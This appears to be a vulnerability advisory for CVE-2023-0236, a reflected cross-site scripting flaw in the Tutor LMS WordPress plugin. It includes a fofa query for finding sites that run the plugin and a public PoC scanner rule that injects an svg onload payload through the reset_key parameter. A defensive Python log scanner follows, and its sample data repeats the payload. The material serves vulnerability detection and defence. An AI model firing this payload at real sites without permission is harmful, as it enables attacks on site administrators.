CVE-2023-0236: Tutor LMS < 2.0.10 - Cross Site Scripting WordPress

Date: 2025-08-01 | Affected software: Tutor LMS | PoC: public

Vulnerability description

The Tutor LMS WordPress plugin before 2.0.10 does not sanitise and escape the reset_key and user_id parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

fofa: app="Tutor LMS"

PoC code [public]

id: CVE-2023-0236

info:
  name: Tutor LMS < 2.0.10 - Cross Site Scripting WordPress
  author: 不动明王
  severity: medium
  verified: true
  description: |-
    The Tutor LMS WordPress plugin before 2.0.10 does not sanitise and
    escape the reset_key and user_id parameters before outputting them back
    in attributes, leading to Reflected Cross-Site Scripting which could be used
    against high privilege users such as admin.
    fofa: app="Tutor LMS"
  reference:
    - https://wpscan.com/vulnerability/503835db-426d-4b49-85f7-c9a20d6ff5b8

rules:
  r0:
    request:
      method: GET
      path: /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd
    expression: response.status == 200 && response.body.bcontains(b"<svg onload=prompt(document.domain)>") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
expression: r0()
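
A defender-side check for the request pattern in the rule above, as an added example that is not part of the original page or of the Tutor LMS project: it scans access-log lines for retrieve-password requests whose reset_key or user_id carries attribute-breakout characters or an unexpected format. The combined log format, the expected token formats and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter names come from the rule above; everything else is an assumption.
RESET_PATH = "/dashboard/retrieve-password"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate reset_key is an alphanumeric token, user_id a numeric ID.
EXPECTED = {"reset_key": re.compile(r"[A-Za-z0-9]+"), "user_id": re.compile(r"[0-9]+")}
# Characters that let a reflected value break out of an HTML attribute.
BREAKOUT = re.compile(r"[\"'<>`]")

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "GET /dashboard/retrieve-password/?reset_key=Ab3dE9xQ2LmN7pRs5TuV&user_id=42 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [01/Aug/2025:10:00:09 +0000] "GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1" 200 5342',
    '203.0.113.7 - - [01/Aug/2025:10:00:15 +0000] "GET /courses/?s=%3Cb%3E HTTP/1.1" 200 900',
]

def inspect_line(line):
    """Return (param, decoded_value, reason) findings for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.rstrip("/").endswith(RESET_PATH):
        return []  # only the password-reset endpoint is in scope
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    for name, pattern in EXPECTED.items():
        for value in params.get(name, []):
            if BREAKOUT.search(value):
                findings.append((name, value, "attribute-breakout characters"))
            elif not pattern.fullmatch(value):
                findings.append((name, value, "unexpected format"))
    return findings

def scan(lines):
    """Return (line_number, finding) pairs for every suspicious parameter."""
    return [(n, f) for n, line in enumerate(lines, 1) for f in inspect_line(line)]

if __name__ == "__main__":
    for lineno, (name, value, reason) in scan(SAMPLE_LOG):
        print(f"line {lineno}: {name}={value!r} ({reason})")
```

Hits matter most on sites still running Tutor LMS before 2.0.10, where the reflected value reaches the page unescaped.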
